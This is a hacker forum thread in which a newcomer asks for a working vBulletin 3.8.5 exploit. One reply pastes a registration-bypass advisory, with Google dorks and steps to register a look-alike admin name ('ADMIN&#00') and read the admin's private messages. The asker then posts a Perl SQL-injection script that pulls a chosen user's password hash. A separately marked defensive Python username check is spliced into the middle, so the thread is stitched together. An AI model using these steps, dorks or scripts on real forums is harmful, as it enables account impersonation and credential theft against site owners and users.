Exploit Forum

    #1

    Exploit Forum

    Hi everyone, I'm new to the forum and would like to know if anyone has a working exploit for the vBulletin v.3.8.5 forum.

    Thanks.

    #2
    Hey, try this:

    ===============================================================
    vBulletin 3.8.4 & 3.8.5 Registration Bypass Vulnerability
    ===============================================================


    Iranian Datacoders Security Team 2010


    # Exploit Title: vBulletin 3.8.4 & 3.8.5 Around Registration Vulnerability
    # Date: 29/08/2010
    # Author: Immortal Boy
    # Software Link: [link hidden by the forum for unregistered users]
    # Version: 3.8.4 & 3.8.5
    # Google dork 1 : powered by vBulletin 3.8.4
    # Google dork 2 : powered by vBulletin 3.8.5
    # Platform / Tested on: Multiple
    # Category: webapplications
    # Code : N/A

    # BUG : #########################################################################

    1 > Go to [link hidden by the forum for unregistered users]

    2 > Assume that forum admin user name is ADMIN

    3 > Type this at User Name ===> ADMIN&#00

    4 > &#00 is an ASCII Code

    5 > And complete the other parameters

    6 > Then click on Complete Registration

    7 > Now you see that your user name looks like the admin user name

    After this time the private messages to the user (ADMIN) to sending see for you is sending .


    # Patch : #######################################################################

    1 > Go to AdminCP

    2 > Click on vBulletin Options and choose vBulletin Options

    3 > Choose Censorship Options

    4 > type &# in Censored Words section

    5 > Then click on Save

    #############################################################################

    Our Website : [link hidden by the forum for unregistered users]

    Special Thanks to : H-SK33PY , NEO , Sp|R|T , BigB4NG , 3r1ck , Dr.mute , hosinn , NIK , uones , mohammad_ir & all iranian datacoders members

    #############################################################################
    Everyone, follow @sirbagda and stay up to date with articles, videos and the like from the hacker world.
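
A registration-time check that generalises the patch in the advisory above, as an added example (not part of the original post and not vBulletin code): it refuses names containing `&#`, and also names that collide with an existing account once entities, case, width and invisible characters are normalised. The user list and the function names `skeleton` and `check_username` are assumptions made for the illustration.

```python
import html
import unicodedata

# Constructed sample data: names already registered on a hypothetical forum.
EXISTING_USERS = {"ADMIN", "moderator"}


def skeleton(name: str) -> str:
    """Canonical form used only for collision checks, never stored or shown."""
    # html.unescape maps the NUL reference "&#00" to U+FFFD, as HTML5 parsers do.
    decoded = html.unescape(name)
    folded = unicodedata.normalize("NFKC", decoded).casefold()
    # Drop control/format/unassigned characters, all separators and U+FFFD,
    # so padding a name with invisible characters does not make it "new".
    return "".join(
        ch for ch in folded
        if unicodedata.category(ch)[0] not in ("C", "Z") and ch != "\ufffd"
    )


def check_username(name: str, existing=EXISTING_USERS) -> list[str]:
    """Return the reasons a requested name is refused (empty list = accept)."""
    reasons = []
    if "&#" in name:
        # Same rule as the advisory's patch (censoring "&#").
        reasons.append("contains '&#' (numeric character reference)")
    if html.unescape(name) != name:
        reasons.append("contains an HTML entity")
    if any(unicodedata.category(ch)[0] == "C" for ch in name):
        reasons.append("contains a control or invisible character")
    if skeleton(name) in {skeleton(u) for u in existing}:
        reasons.append("renders like an existing account")
    return reasons


if __name__ == "__main__":
    # Constructed inputs: the advisory's string plus look-alike variants.
    for candidate in ["ADMIN&#00", "admin\u200b", "Admin ", "ＡＤＭＩＮ", "new_user"]:
        print(repr(candidate), "->", check_username(candidate) or "accepted")
```

Running the collision check on the canonical form, rather than only blocking `&#`, also catches fullwidth, trailing-space and zero-width variants that the censored-word patch would let through.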



      #3
      OK, man, I did everything right, I just didn't understand the AdminCP part; I can't do it at all. Could you help me?

      "After this time the private messages to the user (ADMIN) to sending see for you is sending .


      # Patch : #######################################################################

      1 > Go to AdminCP

      2 > Click on vBulletin Options and choose vBulletin Options

      3 > Choose Censorship Options

      4 > type &# in Censored Words section

      5 > Then click on Save"

      From that part on I can't manage it. I get that AdminCP is the control panel, but I didn't understand how to access it from the account and so on...

      I found another exploit
      #!/usr/bin/perl

      use IO::Socket;


      print q{
      ################################################## ####
      # DeluxeBB Remote SQL Injection Exploit #
      # vbulletin Remote SQL Injection Exploit #
      # // SekoMirza // Turkish Hackerz #
      ################################################## ####
      };

      if (!$ARGV[2]) {

      print q{
      Usage: perl dbbxpl.pl host /directory/ victim_userid

      perl dbbxpl.pl [link hidden by the forum for unregistered users] /forum/ 1


      };

      }


      $server = $ARGV[0];
      $dir = $ARGV[1];
      $user = $ARGV[2];
      $myuser = $ARGV[3];
      $mypass = $ARGV[4];
      $myid = $ARGV[5];

      print "------------------------------------------------------------------------------------------------\r\n";
      print "[>] SERVER: $server\r\n";
      print "[>] DIR: $dir\r\n";
      print "[>] USERID: $user\r\n";
      print "------------------------------------------------------------------------------------------------\r\n\r\n";

      $server =~ s/(http:\/\/)//eg;

      $path = $dir;
      $path .=

      "misc.php?sub=profile&name=0')+UNION+SELECT+0,pass ,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0 ,0+FROM%20deluxebb_users%

      20WHERE%20(uid='".$user ;


      print "[~] PREPARE TO CONNECT...\r\n";

      $socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$server", PeerPort => "80") || die "[-] CONNECTION FAILED";

      print "[+] CONNECTED\r\n";
      print "[~] SENDING QUERY...\r\n";
      print $socket "GET $path HTTP/1.1\r\n";
      print $socket "Host: $server\r\n";
      print $socket "Accept: */*\r\n";
      print $socket "Connection: close\r\n\r\n";
      print "[+] DONE!\r\n\r\n";



      print "--[ REPORT ]------------------------------------------------------------------------------------\r\n";
      while ($answer = <$socket>)
      {

      if ($answer =~/(\w{32})/)
      {

      if ($1 ne 0) {
      print "Password Hash is: ".$1."\r\n";
      print "--------------------------------------------------------------------------------------\r\n";

      }
      exit();
      }

      }
      print "------------------------------------------------------------------------------------------------\r\n";

      ################################################## #######
      #Shoutz: #
      # #
      # My Sweet -> Caramel #
      # For Mp3s -> Hypn0sis #
      # For Support -> [link hidden by the forum for unregistered users] #
      # My Bro -> PhantomOrchid #
      # My Preceptor -> Earnk Kazno #
      ################################################## #######
      only I didn't understand what its real function is; I managed to run it and the following appears



      thanks in advance
